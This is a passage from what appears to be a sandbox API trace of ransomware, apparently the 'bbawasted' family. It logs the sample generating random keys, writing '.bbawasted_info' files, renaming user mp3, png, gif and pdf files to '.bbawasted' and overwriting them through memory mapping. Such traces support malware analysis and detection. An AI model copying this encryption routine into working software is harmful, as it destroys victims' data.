dwLen=0x48, pbBuffer=0xf9fe48 | out: pbBuffer=0xf9fe48) returned 1 [0070.163] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0070.163] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\_1PwpG\\yusR_ZDYxpM7ORa\\s3pxmkuntuL8-\\A0pEXOj7Gs4t_mh1Da\\teFYZEcuHn.mp3") returned 112 [0070.163] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x2ea) returned 0x5bf070 [0070.163] lstrcpyW (in: lpString1=0x5bf150, lpString2=".bbawasted_info" | out: lpString1=".bbawasted_info") returned=".bbawasted_info" [0070.163] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0xa3a) returned 0x5e1fb0 [0070.163] CryptAcquireContextW (in: phProv=0xf9fde8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0xf9fde8*=0x5a4020) returned 1 [0070.164] CryptGenRandom (in: hProv=0x5a4020, dwLen=0xa3a, pbBuffer=0x5e1fb0 | out: pbBuffer=0x5e1fb0) returned 1 [0070.164] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0070.164] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\_1PwpG\\yusR_ZDYxpM7ORa\\s3pxmkuntuL8-\\A0pEXOj7Gs4t_mh1Da\\teFYZEcuHn.mp3.bbawasted_info" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\_1pwpg\\yusr_zdyxpm7ora\\s3pxmkuntul8-\\a0pexoj7gs4t_mh1da\\tefyzecuhn.mp3.bbawasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xf8 [0070.164] WriteFile (in: hFile=0xf8, lpBuffer=0x5e1fb0*, nNumberOfBytesToWrite=0xa3a, lpNumberOfBytesWritten=0xf9fe04, lpOverlapped=0x0 | out: lpBuffer=0x5e1fb0*, lpNumberOfBytesWritten=0xf9fe04*=0xa3a, lpOverlapped=0x0) returned 1 [0070.165] SetEndOfFile (hFile=0xf8) returned 1 [0070.165] SetFilePointer (in: hFile=0xf8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0070.165] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5e1fb0 | out: hHeap=0x580000) returned 1 [0070.165] lstrcpyW (in: lpString1=0x5bf150, lpString2=".bbawasted" | out: lpString1=".bbawasted") returned=".bbawasted" [0070.165] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\_1PwpG\\yusR_ZDYxpM7ORa\\s3pxmkuntuL8-\\A0pEXOj7Gs4t_mh1Da\\teFYZEcuHn.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\_1pwpg\\yusr_zdyxpm7ora\\s3pxmkuntul8-\\a0pexoj7gs4t_mh1da\\tefyzecuhn.mp3"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\_1PwpG\\yusR_ZDYxpM7ORa\\s3pxmkuntuL8-\\A0pEXOj7Gs4t_mh1Da\\teFYZEcuHn.mp3.bbawasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\_1pwpg\\yusr_zdyxpm7ora\\s3pxmkuntul8-\\a0pexoj7gs4t_mh1da\\tefyzecuhn.mp3.bbawasted")) returned 1 [0070.166] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\_1PwpG\\yusR_ZDYxpM7ORa\\s3pxmkuntuL8-\\A0pEXOj7Gs4t_mh1Da\\teFYZEcuHn.mp3.bbawasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\_1pwpg\\yusr_zdyxpm7ora\\s3pxmkuntul8-\\a0pexoj7gs4t_mh1da\\tefyzecuhn.mp3.bbawasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xfc [0070.166] CreateFileMappingW (hFile=0xfc, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x120 [0070.166] GetFileSize (in: hFile=0xfc, lpFileSizeHigh=0xf9fdd4 | out: lpFileSizeHigh=0xf9fdd4*=0x0) returned 0x538 [0070.166] MapViewOfFile (hFileMappingObject=0x120, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x538) returned 0x570000 [0070.166] CloseHandle (hObject=0xfc) returned 1 [0070.168] CryptAcquireContextW (in: phProv=0xf9fdc4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0xf9fdc4*=0x5a4020) returned 1 [0070.168] CryptGenRandom (in: hProv=0x5a4020, dwLen=0x1b8, pbBuffer=0x5bf4e8 | out: pbBuffer=0x5bf4e8) returned 1 [0070.169] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0070.169] CryptAcquireContextW (in: phProv=0xf9fb2c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0xf9fb2c*=0x5a4020) returned 1 [0070.169] CryptGenRandom (in: hProv=0x5a4020, dwLen=0x200, pbBuffer=0xf9fb48 | out: pbBuffer=0xf9fb48) returned 1 [0070.169] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0070.198] SetEndOfFile (hFile=0xf8) returned 1 [0070.200] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5c4538 | out: hHeap=0x580000) returned 1 [0070.200] CloseHandle (hObject=0xf8) returned 1 [0070.201] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5bf070 | out: hHeap=0x580000) returned 1 [0070.201] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5cb4b0 | out: hHeap=0x580000) returned 1 [0070.201] CryptAcquireContextW (in: phProv=0xf9fe0c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0xf9fe0c*=0x5a4020) returned 1 [0070.202] CryptGenRandom (in: hProv=0x5a4020, dwLen=0x48, pbBuffer=0xf9fe48 | out: pbBuffer=0xf9fe48) returned 1 [0070.202] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0070.202] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\_1PwpG\\yusR_ZDYxpM7ORa\\s3pxmkuntuL8-\\KMYKw0.png") returned 89 [0070.202] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x2bc) returned 0x5bf070 [0070.202] lstrcpyW (in: lpString1=0x5bf122, lpString2=".bbawasted_info" | out: lpString1=".bbawasted_info") returned=".bbawasted_info" [0070.202] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0xa3a) returned 0x5c4538 [0070.202] CryptAcquireContextW (in: phProv=0xf9fde8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0xf9fde8*=0x5a4020) returned 1 [0070.203] CryptGenRandom (in: hProv=0x5a4020, dwLen=0xa3a, pbBuffer=0x5c4538 | out: pbBuffer=0x5c4538) returned 1 [0070.203] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0070.203] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\_1PwpG\\yusR_ZDYxpM7ORa\\s3pxmkuntuL8-\\KMYKw0.png.bbawasted_info" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\_1pwpg\\yusr_zdyxpm7ora\\s3pxmkuntul8-\\kmykw0.png.bbawasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xf8 [0070.204] WriteFile (in: hFile=0xf8, lpBuffer=0x5c4538*, nNumberOfBytesToWrite=0xa3a, lpNumberOfBytesWritten=0xf9fe04, lpOverlapped=0x0 | out: lpBuffer=0x5c4538*, lpNumberOfBytesWritten=0xf9fe04*=0xa3a, lpOverlapped=0x0) returned 1 [0070.205] SetEndOfFile (hFile=0xf8) returned 1 [0070.205] SetFilePointer (in: hFile=0xf8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0070.205] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5c4538 | out: hHeap=0x580000) returned 1 [0070.205] lstrcpyW (in: lpString1=0x5bf122, lpString2=".bbawasted" | out: lpString1=".bbawasted") returned=".bbawasted" [0070.205] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\_1PwpG\\yusR_ZDYxpM7ORa\\s3pxmkuntuL8-\\KMYKw0.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\_1pwpg\\yusr_zdyxpm7ora\\s3pxmkuntul8-\\kmykw0.png"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\_1PwpG\\yusR_ZDYxpM7ORa\\s3pxmkuntuL8-\\KMYKw0.png.bbawasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\_1pwpg\\yusr_zdyxpm7ora\\s3pxmkuntul8-\\kmykw0.png.bbawasted")) returned 1 [0070.205] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\_1PwpG\\yusR_ZDYxpM7ORa\\s3pxmkuntuL8-\\KMYKw0.png.bbawasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\_1pwpg\\yusr_zdyxpm7ora\\s3pxmkuntul8-\\kmykw0.png.bbawasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0070.205] CreateFileMappingW (hFile=0x120, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x11c [0070.206] GetFileSize (in: hFile=0x120, lpFileSizeHigh=0xf9fdd4 | out: lpFileSizeHigh=0xf9fdd4*=0x0) returned 0xc80d [0070.206] MapViewOfFile (hFileMappingObject=0x11c, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0xc80d) returned 0x570000 [0070.206] CloseHandle (hObject=0x120) returned 1 [0070.209] CryptAcquireContextW (in: phProv=0xf9fdc4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0xf9fdc4*=0x5a4020) returned 1 [0070.209] CryptGenRandom (in: hProv=0x5a4020, dwLen=0x1b8, pbBuffer=0x5bf4e8 | out: pbBuffer=0x5bf4e8) returned 1 [0070.209] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0070.210] CryptAcquireContextW (in: phProv=0xf9fb2c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0xf9fb2c*=0x5a4020) returned 1 [0070.210] CryptGenRandom (in: hProv=0x5a4020, dwLen=0x200, pbBuffer=0xf9fb48 | out: pbBuffer=0xf9fb48) returned 1 [0070.210] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0070.218] SetEndOfFile (hFile=0xf8) returned 1 [0070.220] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5c4538 | out: hHeap=0x580000) returned 1 [0070.220] CloseHandle (hObject=0xf8) returned 1 [0070.222] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5bf070 | out: hHeap=0x580000) returned 1 [0070.222] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5ca0c0 | out: hHeap=0x580000) returned 1 [0070.222] CryptAcquireContextW (in: phProv=0xf9fe0c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0xf9fe0c*=0x5a4020) returned 1 [0070.223] CryptGenRandom (in: hProv=0x5a4020, dwLen=0x48, pbBuffer=0xf9fe48 | out: pbBuffer=0xf9fe48) returned 1 [0070.223] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0070.223] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\_1PwpG\\yusR_ZDYxpM7ORa\\s3pxmkuntuL8-\\LLBpZucsjw5A5d pG1.gif") returned 101 [0070.223] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x2d4) returned 0x5bf070 [0070.223] lstrcpyW (in: lpString1=0x5bf13a, lpString2=".bbawasted_info" | out: lpString1=".bbawasted_info") returned=".bbawasted_info" [0070.223] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0xa3a) returned 0x5c4538 [0070.223] CryptAcquireContextW (in: phProv=0xf9fde8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0xf9fde8*=0x5a4020) returned 1 [0070.224] CryptGenRandom (in: hProv=0x5a4020, dwLen=0xa3a, pbBuffer=0x5c4538 | out: pbBuffer=0x5c4538) returned 1 [0070.224] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0070.224] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\_1PwpG\\yusR_ZDYxpM7ORa\\s3pxmkuntuL8-\\LLBpZucsjw5A5d pG1.gif.bbawasted_info" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\_1pwpg\\yusr_zdyxpm7ora\\s3pxmkuntul8-\\llbpzucsjw5a5d pg1.gif.bbawasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xf8 [0070.224] WriteFile (in: hFile=0xf8, lpBuffer=0x5c4538*, nNumberOfBytesToWrite=0xa3a, lpNumberOfBytesWritten=0xf9fe04, lpOverlapped=0x0 | out: lpBuffer=0x5c4538*, lpNumberOfBytesWritten=0xf9fe04*=0xa3a, lpOverlapped=0x0) returned 1 [0070.225] SetEndOfFile (hFile=0xf8) returned 1 [0070.225] SetFilePointer (in: hFile=0xf8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0070.225] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5c4538 | out: hHeap=0x580000) returned 1 [0070.225] lstrcpyW (in: lpString1=0x5bf13a, lpString2=".bbawasted" | out: lpString1=".bbawasted") returned=".bbawasted" [0070.225] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\_1PwpG\\yusR_ZDYxpM7ORa\\s3pxmkuntuL8-\\LLBpZucsjw5A5d pG1.gif" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\_1pwpg\\yusr_zdyxpm7ora\\s3pxmkuntul8-\\llbpzucsjw5a5d pg1.gif"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\_1PwpG\\yusR_ZDYxpM7ORa\\s3pxmkuntuL8-\\LLBpZucsjw5A5d pG1.gif.bbawasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\_1pwpg\\yusr_zdyxpm7ora\\s3pxmkuntul8-\\llbpzucsjw5a5d pg1.gif.bbawasted")) returned 1 [0070.226] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\_1PwpG\\yusR_ZDYxpM7ORa\\s3pxmkuntuL8-\\LLBpZucsjw5A5d pG1.gif.bbawasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\_1pwpg\\yusr_zdyxpm7ora\\s3pxmkuntul8-\\llbpzucsjw5a5d pg1.gif.bbawasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x11c [0070.226] CreateFileMappingW (hFile=0x11c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x120 [0070.226] GetFileSize (in: hFile=0x11c, lpFileSizeHigh=0xf9fdd4 | out: lpFileSizeHigh=0xf9fdd4*=0x0) returned 0xd326 [0070.226] MapViewOfFile (hFileMappingObject=0x120, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0xd326) returned 0x570000 [0070.226] CloseHandle (hObject=0x11c) returned 1 [0070.229] CryptAcquireContextW (in: phProv=0xf9fdc4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0xf9fdc4*=0x5a4020) returned 1 [0070.230] CryptGenRandom (in: hProv=0x5a4020, dwLen=0x1b8, pbBuffer=0x5bf4e8 | out: pbBuffer=0x5bf4e8) returned 1 [0070.230] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0070.230] CryptAcquireContextW (in: phProv=0xf9fb2c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0xf9fb2c*=0x5a4020) returned 1 [0070.231] CryptGenRandom (in: hProv=0x5a4020, dwLen=0x200, pbBuffer=0xf9fb48 | out: pbBuffer=0xf9fb48) returned 1 [0070.231] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0070.395] SetEndOfFile (hFile=0xf8) returned 1 [0070.397] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5c4538 | out: hHeap=0x580000) returned 1 [0070.397] CloseHandle (hObject=0xf8) returned 1 [0070.399] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5bf070 | out: hHeap=0x580000) returned 1 [0070.399] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5ca1d0 | out: hHeap=0x580000) returned 1 [0070.399] CryptAcquireContextW (in: phProv=0xf9fe0c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0xf9fe0c*=0x5c8560) returned 1 [0070.400] CryptGenRandom (in: hProv=0x5c8560, dwLen=0x48, pbBuffer=0xf9fe48 | out: pbBuffer=0xf9fe48) returned 1 [0070.400] CryptReleaseContext (hProv=0x5c8560, dwFlags=0x0) returned 1 [0070.400] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\_1PwpG\\yusR_ZDYxpM7ORa\\_vbz.png") returned 73 [0070.400] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x29c) returned 0x5bf070 [0070.400] lstrcpyW (in: lpString1=0x5bf102, lpString2=".bbawasted_info" | out: lpString1=".bbawasted_info") returned=".bbawasted_info" [0070.400] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0xa3a) returned 0x5c4538 [0070.400] CryptAcquireContextW (in: phProv=0xf9fde8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0xf9fde8*=0x5c8560) returned 1 [0070.400] CryptGenRandom (in: hProv=0x5c8560, dwLen=0xa3a, pbBuffer=0x5c4538 | out: pbBuffer=0x5c4538) returned 1 [0070.401] CryptReleaseContext (hProv=0x5c8560, dwFlags=0x0) returned 1 [0070.401] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\_1PwpG\\yusR_ZDYxpM7ORa\\_vbz.png.bbawasted_info" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\_1pwpg\\yusr_zdyxpm7ora\\_vbz.png.bbawasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xf8 [0070.436] WriteFile (in: hFile=0xf8, lpBuffer=0x5c4538*, nNumberOfBytesToWrite=0xa3a, lpNumberOfBytesWritten=0xf9fe04, lpOverlapped=0x0 | out: lpBuffer=0x5c4538*, lpNumberOfBytesWritten=0xf9fe04*=0xa3a, lpOverlapped=0x0) returned 1 [0070.438] SetEndOfFile (hFile=0xf8) returned 1 [0070.438] SetFilePointer (in: hFile=0xf8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0070.438] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5c4538 | out: hHeap=0x580000) returned 1 [0070.438] lstrcpyW (in: lpString1=0x5bf102, lpString2=".bbawasted" | out: lpString1=".bbawasted") returned=".bbawasted" [0070.438] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\_1PwpG\\yusR_ZDYxpM7ORa\\_vbz.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\_1pwpg\\yusr_zdyxpm7ora\\_vbz.png"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\_1PwpG\\yusR_ZDYxpM7ORa\\_vbz.png.bbawasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\_1pwpg\\yusr_zdyxpm7ora\\_vbz.png.bbawasted")) returned 1 [0070.439] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\_1PwpG\\yusR_ZDYxpM7ORa\\_vbz.png.bbawasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\_1pwpg\\yusr_zdyxpm7ora\\_vbz.png.bbawasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xfc [0070.439] CreateFileMappingW (hFile=0xfc, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x11c [0070.439] GetFileSize (in: hFile=0xfc, lpFileSizeHigh=0xf9fdd4 | out: lpFileSizeHigh=0xf9fdd4*=0x0) returned 0x792b [0070.439] MapViewOfFile (hFileMappingObject=0x11c, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x792b) returned 0x570000 [0070.439] CloseHandle (hObject=0xfc) returned 1 [0070.441] CryptAcquireContextW (in: phProv=0xf9fdc4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0xf9fdc4*=0x5a4020) returned 1 [0070.442] CryptGenRandom (in: hProv=0x5a4020, dwLen=0x1b8, pbBuffer=0x5bf4e8 | out: pbBuffer=0x5bf4e8) returned 1 [0070.442] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0070.442] CryptAcquireContextW (in: phProv=0xf9fb2c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0xf9fb2c*=0x5a4020) returned 1 [0070.443] CryptGenRandom (in: hProv=0x5a4020, dwLen=0x200, pbBuffer=0xf9fb48 | out: pbBuffer=0xf9fb48) returned 1 [0070.443] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0070.451] SetEndOfFile (hFile=0xf8) returned 1 [0070.454] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5c4538 | out: hHeap=0x580000) returned 1 [0070.454] CloseHandle (hObject=0xf8) returned 1 [0070.455] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5bf070 | out: hHeap=0x580000) returned 1 [0070.455] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5ca3e8 | out: hHeap=0x580000) returned 1 [0070.455] CryptAcquireContextW (in: phProv=0xf9fe0c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0xf9fe0c*=0x5a4020) returned 1 [0070.456] CryptGenRandom (in: hProv=0x5a4020, dwLen=0x48, pbBuffer=0xf9fe48 | out: pbBuffer=0xf9fe48) returned 1 [0070.456] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0070.456] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\_rt1AaahVlLEV4mJ.pdf") returned 62 [0070.456] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x286) returned 0x5bf070 [0070.456] lstrcpyW (in: lpString1=0x5bf0ec, lpString2=".bbawasted_info" | out: lpString1=".bbawasted_info") returned=".bbawasted_info" [0070.456] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0xa3a) returned 0x5c4538 [0070.456] CryptAcquireContextW (in: phProv=0xf9fde8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0xf9fde8*=0x5a4020) returned 1 [0070.457] CryptGenRandom (in: hProv=0x5a4020, dwLen=0xa3a, pbBuffer=0x5c4538 | out: pbBuffer=0x5c4538) returned 1 [0070.457] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0070.457] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\_rt1AaahVlLEV4mJ.pdf.bbawasted_info" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\_rt1aaahvllev4mj.pdf.bbawasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xf8 [0070.459] WriteFile (in: hFile=0xf8, lpBuffer=0x5c4538*, nNumberOfBytesToWrite=0xa3a, lpNumberOfBytesWritten=0xf9fe04, lpOverlapped=0x0 | out: lpBuffer=0x5c4538*, lpNumberOfBytesWritten=0xf9fe04*=0xa3a, lpOverlapped=0x0) returned 1 [0070.460] SetEndOfFile (hFile=0xf8) returned 1 [0070.460] SetFilePointer (in: hFile=0xf8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0070.460] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5c4538 | out: hHeap=0x580000) returned 1 [0070.460] lstrcpyW (in: lpString1=0x5bf0ec, lpString2=".bbawasted" | out: lpString1=".bbawasted") returned=".bbawasted" [0070.460] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\_rt1AaahVlLEV4mJ.pdf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\_rt1aaahvllev4mj.pdf"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\_rt1AaahVlLEV4mJ.pdf.bbawasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\_rt1aaahvllev4mj.pdf.bbawasted")) returned 1 [0070.461] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\_rt1AaahVlLEV4mJ.pdf.bbawasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\_rt1aaahvllev4mj.pdf.bbawasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x11c [0070.461] CreateFileMappingW (hFile=0x11c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0xfc [0070.461] GetFileSize (in: hFile=0x11c, lpFileSizeHigh=0xf9fdd4 | out: lpFileSizeHigh=0xf9fdd4*=0x0) returned 0x52a1 [0070.461] MapViewOfFile (hFileMappingObject=0xfc, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x52a1) returned 0x570000 [0070.461] CloseHandle (hObject=0x11c) returned 1 [0070.463] CryptAcquireContextW (in: phProv=0xf9fdc4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0xf9fdc4*=0x5a4020) returned 1 [0070.464] CryptGenRandom (in: hProv=0x5a4020, dwLen=0x1b8, pbBuffer=0x5bf4e8 | out: pbBuffer=0x5bf4e8) returned 1 [0070.464] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0070.464] CryptAcquireContextW (in: phProv=0xf9fb2c, szContainer=0x0, szProvider=0x0, 